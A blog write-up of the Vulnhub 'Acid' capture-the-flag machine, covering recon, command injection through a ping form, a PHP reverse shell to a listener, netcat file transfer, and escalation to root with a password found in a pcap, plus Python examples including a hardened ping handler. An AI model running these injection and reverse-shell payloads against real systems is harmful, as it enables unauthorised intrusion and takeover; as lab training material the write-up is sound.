Vulnhub - Acid

Posted on 11 Sep 2015 in security • 6 min read


Since Fart knocker in June I have worked on another Vulnhub machine: darknet. But this one is really hard and got me stuck. I was a bit demotivated to continue with Vulnhub's machines, but I got some time this week, so I tried the Acid one.

The goal is, as usual, to get root on the virtual machine. Let's go:

Host Discovery

As always, we start with host discovery: Nmap and Nikto are our friends for this step.


We launch nmap against the virtual machine:

$ nmap -p0-65535 -A -oA nmap
Starting Nmap 6.47 ( ) at 2015-09-08 12:08 CEST
Stats: 0:07:31 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 98.89% done; ETC: 12:15 (0:00:05 remaining)
Nmap scan report for
Host is up (0.0045s latency).
Not shown: 65535 closed ports
33447/tcp open  unknown
|_http-title: /Challenge

Service detection performed. Please report any incorrect results at .

We got a single open port, 33447, serving an Apache web server with a simple splash screen. Notice the page title in the nmap output: /Challenge.


I ran Nikto on the target but nothing popped out.

Web exploitation

Page source

As we are pretty empty-handed, we check the page source and two interesting things come out:

  • Some hexadecimal code at the end of the page: 0x643239334c6d70775a773d3d
  • the title of the page (we can see it in the nmap scan) is /Challenge and there is an other web page at this address.

Hex code

We start with the first lead, the hexadecimal code. Converting the hex pairs to ASCII gives d293LmpwZw==, which looks like base64; decoding it gives wow.jpg.

We go to that file under /images/ (the folder is taken from the background image of the first web page) and, as a result, we get a nice image that rewards us for our success.


Yeah it seems to be some troll :)
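As an added example (not from the original post), the two decoding steps in Python. decode_layers peels base64 wrappers until the result is no longer base64, which is handy when a challenge nests several layers; the function names are mine.

```python
import base64
import binascii

# Hex string as it appears at the end of the page source (from the write-up).
HEX_BLOB = "0x643239334c6d70775a773d3d"


def hex_to_text(blob: str) -> str:
    """Strip an optional 0x prefix and decode the hex pairs into ASCII."""
    if blob.lower().startswith("0x"):
        blob = blob[2:]
    return binascii.unhexlify(blob).decode("ascii")


def decode_layers(blob: str) -> list:
    """Return every decoding layer, starting with the hex-decoded text.

    Each following element is the base64 decoding of the previous one.
    The loop stops as soon as a layer is not strict base64 or decodes to
    something that is not printable ASCII, so the result shows exactly how
    many wrappers were stacked on the original string.
    """
    layers = []
    current = hex_to_text(blob)
    layers.append(current)
    while True:
        try:
            decoded = base64.b64decode(current, validate=True)
            text = decoded.decode("ascii")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            break
        # Empty or non-printable output means we have gone one layer too far.
        if not text or not text.isprintable():
            break
        layers.append(text)
        current = text
    return layers


if __name__ == "__main__":
    for depth, layer in enumerate(decode_layers(HEX_BLOB)):
        print("layer %d: %s" % (depth, layer))
```

For the page's blob the layers are the base64 string and then the file name, and the loop stops there because a file name with a dot in it is not valid base64.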


Let us dig into the second lead, the page title. By adding /Challenge to the URL, we land on an authentication interface.

I tried SQL injection but got nothing. We try DirBuster with the small dictionary (`/usr/share/dirbuster/directory-list-2.3-small.txt`):

DirBuster 1.0-RC1 - Report
Report produced on Tue Sep 08 16:54:05 CEST 2015
Directories found during testing:

Dirs found with a 200 response:


Dirs found with a 403 response:


Files found during testing:

Files found with a 200 responce:


Files found with a 302 responce:



We got the cake.php page but, as we all know, "The cake is a lie". We notice that the page title is once more a folder: /Magic_Box. Going to /Challenge/Magic_Box gives a 403 Forbidden page. Let us fire DirBuster again:

DirBuster 1.0-RC1 - Report
Report produced on Tue Sep 08 17:17:43 CEST 2015
Directories found during testing:

Dirs found with a 403 response:


Files found during testing:

Files found with a 200 responce:


Files found with a 302 responce:



We got some nice results, most notably the command.php page.

Command execution

The page lets us ping another machine on the network. The page name, however, suggests command execution. If we append a ; and a command to the field, it works: for instance with ; ls we get a directory listing (I use Burp for all my pentests; the output of the command appears in the response page):


We can also read /etc/passwd: there are two users on the server, acid and saman.
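To make the injection concrete, here is an added example in Python (not the box's command.php, whose source we never see): a handler that builds the ping command line the way the page's behaviour suggests, beside a hardened version that allow-lists a literal IP address and never hands the input to a shell. The function names and the echo payload are mine.

```python
import ipaddress
import subprocess


def vulnerable_ping_command(user_input: str) -> str:
    """The pattern command.php appears to follow: the form field is pasted
    into a shell command line unchanged, so ';' ends 'ping' and whatever
    follows is run as a second command."""
    return "ping -c 1 " + user_input


def run_vulnerable(user_input: str) -> str:
    """Execute through /bin/sh exactly as the vulnerable page would and
    return what the attacker sees in the response body (stdout)."""
    proc = subprocess.run(vulnerable_ping_command(user_input),
                          shell=True, capture_output=True, text=True)
    return proc.stdout


def is_valid_ip(user_input: str) -> bool:
    """Allow-list validation: only a bare IPv4/IPv6 literal passes.
    '; ls', '127.0.0.1; ls' or a hostname are all rejected."""
    try:
        ipaddress.ip_address(user_input)
    except ValueError:
        return False
    return True


def run_hardened(user_input: str) -> str:
    """Reject anything that is not an IP, then pass it as its own argv
    element so no shell ever parses it. Even if validation were skipped,
    the list form cannot be turned into a second command."""
    if not is_valid_ip(user_input):
        raise ValueError("refusing to ping %r: not an IP address" % user_input)
    proc = subprocess.run(["ping", "-c", "1", user_input],
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # The injected echo runs even though ping itself fails (no host given).
    print(run_vulnerable("; echo INJECTED"))
    print(is_valid_ip("192.168.0.13"), is_valid_ip("; ls"))
```

Note that the hardened version still shells out; if ping is the only thing the page needs, a raw socket or a library call would remove the process spawn entirely, but the argv list plus the allow-list already closes the hole the write-up exploits.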

Let us try to get a reverse shell with that.

Reverse shell

As always, a good source of information is pentest monkey.

We know the site uses PHP, so we try the PHP reverse shell first:

  • On the attacking host we listen: nc -l -p 6666
  • On the target (via the ping interface) we send: ; php -r '$sock=fsockopen("192.168.0.13",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

It got us a shell on the machine (without a tty/pty). But executing the request through the ping interface each time we want a shell is painful, so I extracted the curl command from Burp:

curl -i -s -k  -X 'POST' \
    -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Referer:' -H 'Content-Type: application/x-www-form-urlencoded' \
    -b 'sec_session_id=2cdjrm9k6khpfiilsad1kmnpj2' \
    --data-binary $'IP=%3B+php+-r+%27%24sock%3Dfsockopen%28%22192.168.0.13%22%2C6666%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&submit=submit' \

Now that we have a shell, let us see what we can do.

Shell exploitation

First we look at what is at our disposal, mostly in /home/ (bash_history). In /home/acid/ there is something interesting, but empty:

$ ls -la /home/acid/.su*
-rw-r--r-- 1 acid acid 0 Jul 31 17:27 /home/acid/.sudo_as_admin_successful

Let us see what else we got on the machine:

$ ls /
$ ls /opt/
$ ls /media
$ ls /s.bin
$ cat /s.bin/investigate.php
echo "Now you have to behave like an investigator to catch the culprit\n";

That is interesting: the PHP file in /s.bin/ clearly tells us to investigate. But what we need now is a privilege escalation to gain root access.

Privilege escalation

I tried the overlayfs exploit (the same as with Fart knocker) without success:

  • I compiled the exploit on an other 32 bits virtual machine;
  • I transfered it to the shell via netcat;
  • And it failed:

    $ ./ofs.bin : 4: spawning threads mount #1 mount #2 child threads done exploit failed

But we were given a hint.

More investigations

The wiki is always a good source of information. So, investigating further, we look at bash_history, search for *txt* files, and so on. Then we look for *pcap* files (the glob is quoted so the shell does not expand it against the current directory):

$ find / -name '*pcap*' 2>/dev/null

Yes /sbin/raw_vs_isi/hint.pcapng!


We transfer the file with netcat:

  • On our attack machine: nc -lp 1234 > pcap
  • On the server: nc 1234 < /sbin/raw_vs_isi/hint.pcapng

We open the pcap file with Wireshark. There is a lot of information in this file, over 6,000 frames. In frame 6212 we notice some sort of text. By following the TCP stream (Follow TCP Stream in Wireshark) we discover what seems to be a chat exchange:


hello What was the name of the Culprit ???

saman and now a days he's known by the alias of 1337hax0r

oh...Fuck....Great...Now, we gonna Catch Him Soon :D

Yes .. We have to !! The mad bomber is on a rage


Over and Out

Great, but what does it mean? We know that saman is one of the users on the machine; maybe this gives us a hint about his password.
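Without Wireshark at hand, the same triage can be done with a strings-style scan of the raw capture: pull out every run of printable ASCII and grep it for words that tend to sit next to credentials. The following is an added example, not from the original post; SAMPLE_CAPTURE is a constructed stand-in with a pcapng-looking header, some binary filler and two chat lines, not the real hint.pcapng, and the keyword list is mine.

```python
import re
import struct

# Constructed stand-in for hint.pcapng: a pcapng Section Header Block magic
# and byte-order magic, filler bytes that are NOT printable ASCII, then a TCP
# payload carrying part of the chat. This is not the capture from the box.
SAMPLE_CAPTURE = (
    b"\x0a\x0d\x0d\x0a" + struct.pack("<I", 28) + b"\x4d\x3c\x2b\x1a"
    + b"\x00" * 16
    + bytes(range(0, 32)) + bytes(range(127, 256))  # binary noise
    + b"hello What was the name of the Culprit ???\n"
    + b"\x45\x00\x00\x3c\x1c\x46\x40\x00"           # IP-header-looking bytes
    + b"saman and now a days he's known by the alias of 1337hax0r\n"
    + b"\xde\xad\xbe\xef"
)


def extract_strings(blob: bytes, min_len: int = 8) -> list:
    """Equivalent of `strings -n min_len`: every run of printable ASCII
    (0x20..0x7e) at least min_len bytes long, in file order."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def credential_candidates(strings: list,
                          keywords=("alias", "password", "passwd",
                                    "known by", "known as")) -> list:
    """Keep only the lines that mention something credential-like. The chat
    in the write-up names the alias explicitly, so 'alias' and 'known by'
    are the words worth watching for."""
    return [s for s in strings
            if any(k in s.lower() for k in keywords)]


def scan_capture(path: str, min_len: int = 8) -> list:
    """Read a capture from disk and return the credential candidates."""
    with open(path, "rb") as fh:
        return credential_candidates(extract_strings(fh.read(), min_len))


if __name__ == "__main__":
    for line in credential_candidates(extract_strings(SAMPLE_CAPTURE)):
        print(line)
```

On the real file, scan_capture("hint.pcapng") does the same job; when tshark is installed, tshark -r hint.pcapng -q -z follow,tcp,ascii,N (N being the stream index) reconstructs the conversation the way the Wireshark dialog does.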

Interactive shell

In order to run su, we need an interactive shell (with a pty/tty). Once more Pentest Monkey helps us:

python -c 'import pty; pty.spawn("/bin/sh")'

Since /bin/sh is a symlink to dash on this box, we spawn bash directly instead:

python -c 'import pty; pty.spawn("/bin/bash")'

We now need to connect as saman. With our proper shell we just have to su saman and try the alias from the chat as the password:

www-data@acid:/var/www/html/Challenge/Magic_Box$ su saman
su saman
Password: 1337hax0r

It works! Let us try sudo su:

saman@acid:/var/www/html/Challenge/Magic_Box$ sudo su
sudo su
[sudo] password for saman: 1337hax0r
root@acid:/var/www/html/Challenge/Magic_Box# cat /root/flag.txt
cat /root/flag.txt

Dear Hax0r,

You have successfully completed the challenge.

I  hope you like it.

FLAG NAME: "Acid@Makke@Hax0r


It was a nice box to root, but reading the other write-ups it seems my way was not the expected one. Nevertheless, thanks to Avinash Kumar Thapa for the box and to VulnHub.